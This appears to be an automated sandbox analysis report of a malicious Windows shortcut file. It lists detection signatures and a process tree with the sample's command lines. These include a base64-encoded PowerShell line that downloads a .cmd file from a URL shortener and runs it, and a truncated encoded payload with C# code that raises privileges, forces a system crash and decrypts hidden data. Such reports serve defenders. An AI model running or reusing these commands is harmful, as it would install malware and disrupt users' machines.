Edit tour
Windows
Analysis Report
Windows PowerShell.lnk
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious encrypted Powershell command line found
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for sample
Performs an instant shutdown (NtRaiseHardError)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Compiles C# or VB.Net code
Connects to a URL shortener service
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Execution of Powershell with Base64
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64
- powershell.exe (PID: 3468 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -e aQB3AHI AIABpAHMAL gBnAGQALwB qAHcAcgA3A EoARAAgAC0 AbwAgACQAZ QBuAHYAOgB UAE0AUAAvA C4AYwBtAGQ AOwAmACAAJ ABlAG4AdgA 6AFQATQBQA C8ALgBjAG0 AZAA= MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6524 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 5956 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Local \Temp\.cmd "" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 5784 cmdline:
cmd /c exi t 97 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 5672 cmdline:
cmd /c exi t 98 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 356 cmdline:
cmd /c exi t 99 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 3816 cmdline:
cmd /c exi t 100 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 1372 cmdline:
cmd /c exi t 101 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 796 cmdline:
cmd /c exi t 102 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 5952 cmdline:
cmd /c exi t 103 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 5716 cmdline:
cmd /c exi t 104 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 5764 cmdline:
cmd /c exi t 105 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 1008 cmdline:
cmd /c exi t 106 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 404 cmdline:
cmd /c exi t 107 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 1668 cmdline:
cmd /c exi t 108 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 4232 cmdline:
cmd /c exi t 109 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 5812 cmdline:
cmd /c exi t 110 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 936 cmdline:
cmd /c exi t 111 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 1364 cmdline:
cmd /c exi t 112 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 4620 cmdline:
cmd /c exi t 113 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 616 cmdline:
cmd /c exi t 114 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 1672 cmdline:
cmd /c exi t 115 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 1016 cmdline:
cmd /c exi t 116 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 2084 cmdline:
cmd /c exi t 117 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 2324 cmdline:
cmd /c exi t 118 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 3360 cmdline:
cmd /c exi t 119 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 3004 cmdline:
cmd /c exi t 120 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 5696 cmdline:
cmd /c exi t 121 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 3820 cmdline:
cmd /c exi t 122 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 3704 cmdline:
cmd /c exi t 65 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 6568 cmdline:
cmd /c exi t 66 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 7016 cmdline:
cmd /c exi t 67 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 4328 cmdline:
cmd /c exi t 68 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 3160 cmdline:
cmd /c exi t 69 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 2308 cmdline:
cmd /c exi t 70 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 672 cmdline:
cmd /c exi t 71 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 5988 cmdline:
cmd /c exi t 72 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 4232 cmdline:
cmd /c exi t 73 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 5812 cmdline:
cmd /c exi t 74 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 936 cmdline:
cmd /c exi t 75 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 1364 cmdline:
cmd /c exi t 76 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 4620 cmdline:
cmd /c exi t 77 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 616 cmdline:
cmd /c exi t 78 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 1512 cmdline:
cmd /c exi t 79 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 1136 cmdline:
cmd /c exi t 80 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 1924 cmdline:
cmd /c exi t 81 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 5700 cmdline:
cmd /c exi t 82 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 3360 cmdline:
cmd /c exi t 83 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 3816 cmdline:
cmd /c exi t 84 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 1372 cmdline:
cmd /c exi t 85 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 6288 cmdline:
cmd /c exi t 86 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 5716 cmdline:
cmd /c exi t 87 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 2548 cmdline:
cmd /c exi t 88 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 4328 cmdline:
cmd /c exi t 89 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 3160 cmdline:
cmd /c exi t 90 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 2308 cmdline:
cmd /c exi t 48 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 672 cmdline:
cmd /c exi t 49 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 6108 cmdline:
cmd /c exi t 50 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 2924 cmdline:
cmd /c exi t 51 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 3152 cmdline:
cmd /c exi t 52 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 3748 cmdline:
cmd /c exi t 53 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 4620 cmdline:
cmd /c exi t 54 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 1016 cmdline:
cmd /c exi t 55 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 2084 cmdline:
cmd /c exi t 56 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 5676 cmdline:
cmd /c exi t 57 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 5980 cmdline:
cmd /c exi t 123 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 5672 cmdline:
cmd /c exi t 125 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 3220 cmdline:
cmd /c exi t 63 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 6068 cmdline:
cmd /c exi t 58 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 1088 cmdline:
cmd /c exi t 46 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 5716 cmdline:
cmd /c exi t 61 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 2548 cmdline:
cmd /c exi t 44 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 4328 cmdline:
cmd /c exi t 95 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 3160 cmdline:
cmd /c exi t 45 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - powershell.exe (PID: 6196 cmdline:
powershell -e JABzAD 0AJwB1AHMA aQBuAGcAIA BTAHkAcwB0 AGUAbQA7AH UAcwBpAG4A ZwAgAFMAeQ BzAHQAZQBt AC4AVABlAH gAdAA7AHUA cwBpAG4AZw AgAFMAeQBz AHQAZQBtAC 4AUwBlAGMA dQByAGkAdA B5AC4AQwBy AHkAcAB0AG 8AZwByAGEA cABoAHkAOw B1AHMAaQBu AGcAIABTAH kAcwB0AGUA bQAuAFIAdQ BuAHQAaQBt AGUALgBJAG 4AdABlAHIA bwBwAFMAZQ ByAHYAaQBj AGUAcwA7AH UAcwBpAG4A ZwAgAFMAeQ BzAHQAZQBt AC4ASQBPAD sAcAB1AGIA bABpAGMAIA BjAGwAYQBz AHMAIABYAH sAWwBEAGwA bABJAG0AcA BvAHIAdAAo ACIAbgB0AG QAbABsAC4A ZABsAGwAIg ApAF0AcAB1 AGIAbABpAG MAIABzAHQA YQB0AGkAYw AgAGUAeAB0 AGUAcgBuAC AAdQBpAG4A dAAgAFIAdA BsAEEAZABq AHUAcwB0AF AAcgBpAHYA aQBsAGUAZw BlACgAaQBu AHQAIABwAC wAYgBvAG8A bAAgAGUALA BiAG8AbwBs ACAAYwAsAG 8AdQB0ACAA YgBvAG8AbA AgAG8AKQA7 AFsARABsAG wASQBtAHAA bwByAHQAKA AiAG4AdABk AGwAbAAuAG QAbABsACIA KQBdAHAAdQ BiAGwAaQBj ACAAcwB0AG EAdABpAGMA IABlAHgAdA BlAHIAbgAg AHUAaQBuAH QAIABOAHQA UgBhAGkAcw BlAEgAYQBy AGQARQByAH IAbwByACgA dQBpAG4AdA AgAGUALAB1 AGkAbgB0AC AAbgAsAHUA aQBuAHQAIA B1ACwASQBu AHQAUAB0AH IAIABwACwA dQBpAG4AdA AgAHYALABv AHUAdAAgAH UAaQBuAHQA IAByACkAOw BwAHUAYgBs AGkAYwAgAH MAdABhAHQA aQBjACAAdQ BuAHMAYQBm AGUAIABzAH QAcgBpAG4A ZwAgAFMAaA BvAHQAKAAp AHsAYgBvAG 8AbAAgAG8A OwB1AGkAbg B0ACAAcgA7 AFIAdABsAE EAZABqAHUA cwB0AFAAcg BpAHYAaQBs AGUAZwBlAC gAMQA5ACwA dAByAHUAZQ AsAGYAYQBs AHMAZQAsAG 8AdQB0ACAA bwApADsATg B0AFIAYQBp AHMAZQBIAG EAcgBkAEUA cgByAG8Acg AoADAAeABj ADAAMAAwAD AAMAAyADIA LAAwACwAMA AsAEkAbgB0 AFAAdAByAC 4AWgBlAHIA bwAsADYALA BvAHUAdAAg AHIAKQA7AG IAeQB0AGUA WwBdAGMAPQ BDAG8AbgB2 AGUAcgB0AC 4ARgByAG8A bQBCAGEAcw BlADYANABT AHQAcgBpAG 4AZwAoACIA UgBOAG8AOA BUAFoANQA2 AFIAdgArAE UAeQBaAFcA NwAzAE4Abw BjAEYATwBJ AGkATgBGAG YATAA0ADUA dABYAHcAMg A0AFUAbwBn AEcAZABIAG sAcwB3AGUA YQAvAFcAaA BuAE4AaABD AE4AdwBqAF EAbgAxAGEA VwBqAGYAdw AiACkAOwBi AHkAdABlAF sAXQBrAD0A QwBvAG4Adg BlAHIAdAAu AEYAcgBvAG 0AQgBhAHMA ZQA2ADQAUw B0AHIAaQBu AGcAKAAiAC 8AYQAxAFkA KwBmAHMAcA BxAC8ATgB3 AGwAYwBQAH cAcABhAFQA MwBpAHIAWQ AyAGgAYwBF AHkAdABrAH QAdQBIADcA TABzAFkAKw BOAGwATABl AHcAPQAiAC kAOwBiAHkA dABlAFsAXQ BpAD0AQwBv AG4AdgBlAH IAdAAuAEYA cgBvAG0AQg BhAHMAZQA2 ADQAUwB0AH IAaQBuAGcA KAAiADkAcw BYAEcAbQBL ADQAcQA5AE wAZABZAEYA ZABPAHAANA BUAFMAcwBR AHcAPQA9AC IAKQA7AHUA cwBpAG4AZw AoAEEAZQBz ACAAYQA9AE EAZQBzAC4A QwByAGUAYQ B0AGUAKAAp ACkAewBhAC 4ASwBlAHkA PQBrADsAYQ AuAEkAVgA9 AGkAOwBJAE MAcgB5AHAA dABvAFQAcg BhAG4AcwBm AG8AcgBtAC AAZAA9AGEA LgBDAHIAZQ BhAHQAZQBE AGUAYwByAH kAcAB0AG8A cgAoAGEALg BLAGUAeQAs AGEALgBJAF YAKQA7AHUA cwBpAG4AZw AoAHYAYQBy ACAAbQA9AG 4AZQB3ACAA TQBlAG0Abw ByAHkAUwB0 AHIAZQBhAG 0AKABjACkA KQB1AHMAaQ BuAGcAKAB2 AGEAcgAgAH kAPQBuAGUA dwAgAEMAcg B5AHAAdABv AFMAdAByAG UAYQBtACgA bQAsAGQALA BDAHIAeQBw AHQAbwBTAH QAcgBlAGEA bQBNAG8AZA BlAC4AUgBl AGEAZAApAC